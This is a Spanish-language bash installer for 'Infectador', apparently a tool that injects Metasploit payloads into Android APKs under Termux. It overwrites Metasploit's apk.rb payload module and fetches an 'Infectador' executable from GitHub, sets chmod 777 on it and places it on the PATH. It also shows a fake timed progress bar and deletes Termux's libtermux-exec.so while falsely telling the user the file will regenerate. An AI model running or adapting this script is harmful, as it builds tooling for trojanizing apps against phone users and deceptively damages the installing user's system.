#!/bin/bash
clear
	R='\033[1;31m'                                                          G='\033[1;32m'                                                          Y='\033[1;33m'                                                          B='\033[1;34m'                                                          M='\033[1;35m'
        C='\033[1;36m'
        W='\033[0m'
echo -e "$C"
echo
echo
echo " ___        __           _            _"
echo "|_ _|_ __  / _| ___  ___| |_ __ _  __| | ___  _ __"
echo " | ||  _ \| |_ / _ \/ __| __/ _  |/ _  |/ _ \|  __|"
echo " | || | | |  _|  __/ (__| || (_| | (_| | (_) | |"
echo "|___|_| |_|_|  \___|\___|\__\__,_|\__,_|\___/|_|"
echo -e "$R           Create by @CesarHackGray"
echo
echo
sleep 5
echo
echo
echo
printf "$B[*]$W Checando Metasploit"
sleep 7


echo
echo


if [ ! -e ~/metasploit-framework ]; then
	echo
	echo
	sleep 1
	printf "$B[*]$W Error no tienes metasploit instalado :v\n"
	printf "$B[*]$W Contacta a César https://t.me/CesarGra\n"
	printf "$B[*]$W apt-get install metasploit-framework\n"
	echo
	sleep 4
	exit 2
fi

echo

echo $(clear)
echo
echo
echo
printf "$B[*]$W Descargando requisitos$G"
echo
echo
echo
sleep 3

apt-get update && apt-get upgrade -y
sudo apt-get install wget -y
sudo apt-get install curl -y
sudo apt-get install apksigner -y
sudo apt-get install php python2 -y
sudo apt-get install php termux-api -y
sudo apt-get install neofetch -y
sudo apt-get install apktool -y
sudo apt-get install apksigner -y
sudo apt-get install net-tools

echo $(clear)
echo
echo
echo
printf "$B[*]$W Moviendo archivos a termux$G"
echo
echo
echo
cd ~
echo
sleep 8
cp ~/infectador-framework/publickey.pk8 $PREFIX/bin
cp ~/infectador-framework/publickey.x509.pem $PREFIX/bin
cp ~/infectador-framework/aapt $PREFIX/bin
mv ~/infectador-framework/keytool $PREFIX/bin
mv ~/infectador-framework/zipalign $PREFIX/bin
mv ~/infectador-framework/jarsigner $PREFIX/bin

echo $(clear)
echo
echo
printf "$B[*]$W Metasploit dañado :("
sleep 2
echo
echo
echo
printf "$B[*]$W Reparando...."
echo
echo
echo
sleep 7
mv ~/metasploit-framework/lib/msf/core/payload/apk.rb ~/metasploit-framework/lib/msf/core/payload/apk.rb.0


echo $(clear)
echo
echo
echo
echo
cd ~
printf "$B[*]$W Reparado :)...."
echo
echo
echo
echo
sleep 4
echo $(clear)

cd ~
        echo $(wget https://raw.githubusercontent.com/Cesar-Hack-Gray/release-download/master/apk.rb)

mv ~/apk.rb ~/metasploit-framework/metasploit-framework/lib/msf/core/payload
echo $(clear)
	

cd ~/infectador-framework

rm -rf ~/infectador-framework/Infectador

	echo $(wget https://raw.githubusercontent.com/Cesar-Hack-Gray/release-download/master/Infectador)


	echo $(clear)

	echo $(clear)
echo
echo
sleep 10
echo
echo
echo
echo
printf "$B[*]$W Brinando modos a cada uno.."
echo
echo
echo
echo
echo
sleep 10
echo


chmod 777 ~/infectador-framework//publickey.pk8
chmod 777 ~/infectador-framework/publickey.x509.pem
chmod 777 ~/infectador-framework/aapt
chmod 777 ~/infectador-framework/signapk.jar
chmod 777 ~/infectador-framework/signapk
chmod 777 $PREFIX/bin/publickey.pk8
chmod 777 $PREFIX/bin/publickey.x509.pem
chmod 777 $PREFIX/bin/aapt
chmod 777 $PREFIX/bin/keytool
chmod 777 $PREFIX/bin/apktool
chmod 777 $PREFIX/bin/jarsigner
chmod 777 $PREFIX/bin/zipalign
chmod 777 ~/infectador-framework/Infectador
cp ~/infectador-framework/Infectador $PREFIX/bin

echo $(clear)
echo
echo
echo
echo
echo
printf "$B[*]$W Descargando raises del scritp"
echo
echo
echo
echo
echo
sleep 4


echo
echo
echo $(clear)
printf "$R Descargandooo el cofigo ....."
echo
sleep 7
echo
printf "$B[*]$W Descargando 10...   [>           ] tiempo 1:30 segundos "
echo
sleep 10
echo $(clear)
printf "$R Descargandooo el cofigo ....."
echo
printf "$B[*]$W Descargando 18...   [>>          ] tiempo 58 segundos"
echo
sleep 13
echo $(clear)
printf "$R Descargandooo el cofigo ....."
echo
printf "$B[*]$W Descargando 30...   [>>>         ] tiempo 46 segundos"
echo
sleep 16
echo $(clear)
printf "$R Descargandooo el cofigo ....."
echo
printf "$B[*]$W Descargando 48...   [>>>>        ] tiempo 35 segundos"
echo
sleep 16
echo $(clear)
printf "$R Descargandooo el cofigo ......"
echo
printf "$B[*]$W Descargando 68...   [>>>>>>>     ] tiempo 25 segundos"
echo
sleep 18
echo $(clear)
printf "$R Descargandooo el cofigo ......"
echo
printf "$B[*]$W Descargando 75...   [>>>>>>>>    ] tiempo 17 segundos"
echo
sleep 16
echo $(clear)
printf "$R Descargandooo el cofigo ......"
echo
printf "$B[*]$W Descargando 88...   [>>>>>>>>>>  ] tiempo 11 segundos"
echo
sleep 18
echo $(clear)
printf "$R Descargandooo el cofigo ......."
echo
printf "$B[*]$W Descargando 97...   [>>>>>>>>>>> ] tiempo 6 segundos"
echo
sleep 19
echo $(clear)
printf "$R Descargandooo el cofigo ......."
echo
printf "$B[*]$W Descargando 100...  [>>>>>>>>>>>>] tiempo 0 segundos"
echo
sleep 15
echo $(clear)
echo
echo
echo
printf "$B[*]$W Extrayendo..."
echo
echo
echo
sleep 5
echo
echo
echo $(clear)
echo
echo 
echo
printf "$B[*]$W Moviendo modulos"
echo
echo
echo
echo
sleep 3
rm -rf ~/metasploit-framework/lib/msf/core/payload/modulos
rm -rf ~/modulos

mv ~/infectador-framework/modulos ~/metasploit-framework/lib/msf/core/payload


$(clear)
echo
echo
echo
sleep 8
printf "$B[*]$W Listo.."
sleep 4
echo
echo
echo
echo
clear
	echo -e "$G"
	echo -e "    ___ _   ___   _______ ____ _____ ___  ____"
	echo -e "   |_ _| \ | \ \ / / ____/ ___|_   _/ _ \|  _  "
	echo -e "    | ||  \| |\ V /|  _|| |     | || | | | |_) |"
	echo -e "    | || |\  | | | | |__| |___  | || |_| |  _ <"
	echo -e "   |___|_| \_| |_| |_____\____| |_| \___/|_| \_\\ "
	echo -e "$C esta herramienta se realizo con fines educativos"
	echo -e "$R            Create by @CesarHackGray"


echo
echo
echo -e "$Y[Gray]$C Ejecueta Injector con el comando $G ./Infectador"
echo
sleep 13
echo
printf "$C Cargandooo"
echo


cd ~
if [ -e /data/data/com.termux/files/usr/lib/libtermux-exec.so ]; then
echo -e "$C Se elimino un archivo que impide que Injector corra"
echo -e "$C termux dejara de funsionar 2 a 3 minutos"
echo -e "$C esto devido a que el archivo que se elimino es"
echo -e "$C de 64 bist Injector es de 32 bits"
echo -e "$C asi que no te preocupes se regenara otro archivo"
echo -e "$C automaticamente para 32 y 64 bits" 
echo -e "$C si termux dejo de funsionar sal y regresa en 3"
echo -e "$C minutos para que termux se recupere no elimina"
echo -e "$C nada de lo que tengas instalando en termux"
sleep 3
rm -rf /data/data/com.termux/files/usr/lib/libtermux-exec.so


else

echo
echo
echo -e "$B[*]$W Infectador puede ser usada satisfactoriamente"
echo
rm -rf ~/infectador-framework/setup
sleep 3
fi
